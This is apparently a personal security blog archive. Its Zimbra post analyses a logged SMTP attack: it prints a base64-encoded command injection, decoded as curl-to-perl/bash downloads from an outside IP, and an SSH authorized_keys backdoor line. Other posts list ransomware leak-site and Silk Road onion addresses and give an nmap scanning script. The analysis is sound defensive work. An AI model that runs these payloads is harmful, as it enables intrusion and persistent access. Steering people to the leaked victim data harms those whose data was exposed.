Archive for the ‘Allgemein’ Category

Continuous ransomware attacks

Saturday, September 12th, 2026

The “Berlin” hack, although quite prominent, is just a single event in a continuous
stream of attacks by different groups against all kinds of targets — banks, schools, hospitals, cities, …

https://www.ransomlook.io/recent

This is a real industry, moving huge amounts of money.

And no – BTC (Bitcoin) is not the problem.
With Bitcoin, every transaction is recorded on the blockchain, which makes it possible to “follow the money”.
By paying in FIAT (like Dollar, Euro..) those traces can be much harder to follow.

Berlin data – Rhysida in the darkweb

Saturday, September 12th, 2026

Recently it became known that the hacker group “Rhysida” infiltrated the Berlin
internal network and downloaded some 5TB of data.

Rhysida demanded 30 BTC in exchange for deleting the stolen data – Berlin did not pay, so the
data appeared on the darkweb.
While there was a lot of talk in the news about this, the leaked data itself was not shown.
So the public could not see what by then already publicly available data actually had been leaked.
Since it sometimes is a bit tricky to find the right addresses on the darkweb I show you
here the target:

If you download and use a TOR Browser , you can see for yourself at these addresses:

URL,Type,Status,Date,PageTitle
http://rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion/,DLS,inactive,2026-09-05,Rhysida
http://rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion/,DLS,inactive,2026-09-05,Rhysida
http://rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion/archive.php,DLS,inactive,2026-09-05,
http://rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion/archive.php?auction,DLS,inactive,2026-09-05,
http://rhysidaeoxtkejwuheks3a7htk4zn3dfuynt5mqw6oawlcx6kcxjdeyd.onion,FS,inactive,2026-01-05,Onionsite Not Found
http://rhysidaiqemmlrvn2jvncdwhkvuiv7s2iu342xnrpeynxoe6r2dtjfyd.onion,FS,inactive,2026-01-06,Onionsite Not Found
http://rhysidaqho36b6i6mvpmy5di4ro5zglovtxixrirky6q3fgack7q5uyd.onion,FS,inactive,2026-09-05,Onionsite Not Found

Sometimes they are reachable, sometimes not..

(Btw: the hacker group also claims to have hacked “Stuttgart”, another major city in germany. The data itself show
“only” a hack of a housing company “GVV”)

On the front page, you can see the group’s current auctions and victims.
Berlin shows this info:

Zimbra exploit

Tuesday, September 1st, 2026

postfix logs are sometimes interesting. See here:


2026-08-30T07:23:30.237580+00:00 manta postfix/smtpd[1103478]: NOQUEUE: reject: RCPT from unknown[192.243.105.20]: 550 5.7.1 Client host rejected: cannot find your reverse hostname, [192.243.105.20]; from=test@example.invalid to=<"x: Service status change: localhost $(echo 'Y3VybCAtc1MgMTQ3LjE4Mi4yMjQuMjE2L3plZHxwZXJsICYmIGN1cmwgLXNTIDE0Ny4xODIuMjI0LjIxNi9oaC5zaHxiYXNoCg=='|base64 -d|bash) changed from stopped to running"@cve.invalid> proto=ESMTP helo=<mx-test.invalid>

That does not look like reasonable smtp-chat ..the “echo” command translates to:

curl -sS 147.182.224.216/zed|perl && curl -sS 147.182.224.216/hh.sh|bash

The downloaded “zed” file is an attacking IRC client (bot), controlled by the IRC server 89.47.232.104.

File can be found here: irc-client

The hh.sh installs an SSH public key as a persistent backdoor by appending it to

/opt/zimbra/.ssh/authorized_keys

This looks like:

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCeIfOA/sN/0yWH46X1rdnMq97nWkntL+M4gjtQjzgitj0nHT1+Gou9IN6oFTLhEIsklzWxUl/ZL5DwWrRiC+op4VsuHgD2+FzHIWQgO1Uqq2o0mjc7jBNDaUZGDughILDcl6OFeeViMkjJQpnnCFGEIT6DQEut+Cw9dLEcuzw9RN2QNa6RhLU02aqderBP+6E2tL74LMcr+vrzMvPlyTufKf7SeGgQ4pn0vp6ZZM6llT6h1lImhcEcdtyPfRVo+hFM2cA0wIrh0GcTU0/r3SiZfPvndVV4y8GhgndKgQxpGJ2/CVu/KN/vmkNGAWQTwZRu6TwNhb7c2Nsjim9N79foh1Nu3gNujr4Zg/pnOIbcqf0yOEpMJunZV3XX55FAaAXr2E5kkcJWd5K6j2DX590AT2y6hfVF0BQMrDkaRlOm65d3Tr+gfeUCQhu27gdoW1Big9SX+FgUgPptjQYwSzufImnFBn/sTl87t3JGt1bhuwroijdq69dc7d7A0tB5636INyM2RwaJx5dRxL39SDF1ZhVXHQA+FzykTLydll8x8t/lpV+zqB5aUZlgkLVDPaWyqh7SZcXv/eZK/fintNzI4UBOgH4kzhVjKOoCGEZc1/sDDAxlFe1LzaCA/x3yl5OmrXy8XzyhjG4JSDqCO4hHQXXq+LDNu6GqigWTFSIwKw== my-server-key-2026" >> /opt/zimbra/.ssh/authorized_keys;chmod 600 /opt/zimbra/.ssh/authorized_keys

This exploit seems to work against “ZIMBRA” ; some CVE were published on 28.8.26 This attack here might be related to CVE-2026-73570, an unauthenticated command injection vulnerability via specially crafted SMTP requests which is currently being actively exploited. I have not verified that this particular attack actually uses CVE-2026-73570.

Chinese hackers

Thursday, May 4th, 2017

Recently on a firewall log: 1 million deny entries PER DAY from china ..

Every day .. ~ 1 million deny entries with source in China.

Can’t we just ban them from the internet?

 

RSA broken?

Thursday, February 25th, 2016

Via twitter i was directed to

https://www.linkedin.com/pulse/rsa-beginning-end-william-buchanan

(Thanks @Andrea for retweeting)

and saw a really fascinating approach to break RSA by pre-calculated prime factors.

Here is an online RSA-cracker:

http://asecuritysite.com/encryption/crackrsa?n=89%2C070%2C570%2C720%2C149%2C060%2C561%2C995%2C361%2C437%2C269%2C869%2C694%2C609%2C685%2C454%2C824%2C674%2C559

 

(cracking N=8907057072014906056199536143726986969460968545482 )

Wondering what will come next..

 

remote website screenshots

Tuesday, January 12th, 2016

Recently I wanted to check, if and what kind of webpages are available in a specific ip-address range. So I decided to scan the ips and make screenshots of the found services. Not as professional as archive.org or similar .. just a short look to get an idea. Problem was, that there was no tool which I just could fire up. So I started frickling some scripts ..

Step 1: scan the ip-range. I used nmap (what else) and logged the results in a file.

 nmap --open -p80,443 --host-timeout 3 --max-retries 2 172.16.0.0/16 > ll

That went quite fast.. Took only a few minutes. After that I started a small script for cleaning the result:

#!/bin/bash
grep -i "skipping" *ll > sl
awk '{ print $4}' < sl | sed s/\(// | sed s/\)// > sl2
grep "report for" *ll > l
awk '{ print $NF}' < l | sed s/\(// | sed s/\)// > l2
for i in ` cat sl2`
do
 grep -v $i l2 > xx
 mv xx l2
done
 
./l.sh
./i.sh

Okay .. here is the l.sh and i.sh:
l.sh: (start TOR first .. don’t want to annoy someone..)

for i in `cat l2`
do
torsocks wget –convert-links -B http://$i –no-check-certificate -t 1 -T 2 -O $i.html $i ; xvfb-run — wkhtmltopdf $i.html $i.pdf
torsocks wget –convert-links -B https://$i –no-check-certificate -t 1 -T 2 -O $i-443.html https://$i ; xvfb-run — wkhtmltopdf $i-443.html $i-443.pdf
done

Needed some tries with wget until I had an acceptable result. Played around with “-p” and “-r -l 1” and “-E” and  “-K” .. that one with just the -B worked best for me. So had the html-files.. but I wanted to have a quick look at them and did not want to start browsing local files. Therefore I transformed the html-files to pdf, and then (in the next step) I used convert to get png – files. (Did not find any html-to-png tools)

i.sh :

for i in `ls *pdf`
do
  convert $i `basename -s .pdf $i`.png 
done

(After that: copy the png-files to a place of your choice.., generate thumbnails..scroll around…)

There are some commcial vendors for services like this with much better quality (including zoomable thumbnails, galeries..you name it) but I wanted to have a quick’n dirty solution for free..

Though I am pretty sure that there are much better tools and hundred better solutions this worked for me.

So you want to be a darknet drug lord ..

Thursday, April 16th, 2015

..is the title of an article a user named “th3j35t3r” published on pastebin.

Here is the Link to the interesting article

(local copy: druglord )

Starwars in the office

Monday, January 5th, 2015

Now here is a funny movie what happens in an office when nerds get attacked..

https://t.co/JIBMlNs4ei

scanner at the airport

Wednesday, December 24th, 2014

A posting in german about my experiences with bodyscanners at the cologne airport can be found at

http://verzaell.uss.koeln/?p=67

 

Merry Christmas everyone!

…and there it is again :-)

Sunday, November 9th, 2014

Did not take too long this time.. Silk Road 3.0 is on its way..

 

  1. — SilkRoad3.0 —
  2. http://reloadedudjtjvxr.onion
  3. —SilkRoad3.0 Forums —
  4. http://b6bubdh43n6l6p72.onion

 http://pastebin.com/rJTmzwvM